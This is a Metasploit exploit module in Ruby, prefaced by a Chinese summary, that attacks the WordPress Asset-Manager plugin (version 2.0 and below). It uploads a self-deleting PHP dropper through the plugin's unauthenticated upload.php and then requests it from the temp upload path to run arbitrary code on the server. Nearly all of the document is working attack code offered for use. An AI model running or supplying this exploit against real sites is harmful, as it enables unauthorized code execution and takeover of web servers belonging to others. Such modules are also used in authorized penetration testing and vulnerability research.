这个模块是 Metasploit 漏洞库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的利用模块。该插件的 upload.php 允许未经身份验证的用户将文件（包括 PHP 文件）上传到一个临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
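# Framework core plus the PhpEXE mixin that builds the self-deleting PHP
# dropper used by this module (get_write_exec_payload).
require 'msf/core'
require 'msf/core/exploit/php_exe'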
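class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Module metadata for the Asset-Manager <= 2.0 unauthenticated upload.
  # The plugin's upload.php accepts a multipart "Filedata" part with no
  # authentication and the module expects the file to land under
  # wp-content/uploads/assets/temp/, where a .php upload is directly reachable.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL appears to be a repost site, not the original
          # advisory; treat the OSVDB/BID/EDB ids above as the authoritative refs.
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          # The dropper is written into a PHP file, so an embedded NUL would
          # truncate the payload.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a self-deleting PHP payload through upload.php, then requests it
  # from the predictable temp path so the web server executes it.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply) when the upload response
  # is missing, non-200 or does not echo the uploaded file name, or when the
  # follow-up GET returns a definite non-200 status.
  def exploit
    base_uri = target_uri.path
    # Build the prefix without mutating the string returned by target_uri.
    base_uri = "#{base_uri}/" unless base_uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self makes the dropped file remove itself once it runs, so a
    # successful run does not leave an unauthenticated webshell on the target.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base_uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The module expects upload.php to echo the stored file name on success.
    # A literal substring check avoids treating the name as a regex.
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    dropped_uri = "#{base_uri}wp-content/uploads/assets/temp/#{payload_name}"
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => dropped_uri,
      'method' => 'GET'
    })

    # Only a definite non-200 is treated as failure; a nil response is left as
    # success, presumably because a payload that holds the connection open
    # (e.g. a reverse shell) never returns a status to check.
    if res && res.code != 200
      # The file only unlinks itself when it executes, so on failure it is
      # still on disk at a predictable, unauthenticated path — tell the
      # operator so it can be removed.
      print_error("#{peer} - #{dropped_uri} may still exist on the target and should be removed")
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end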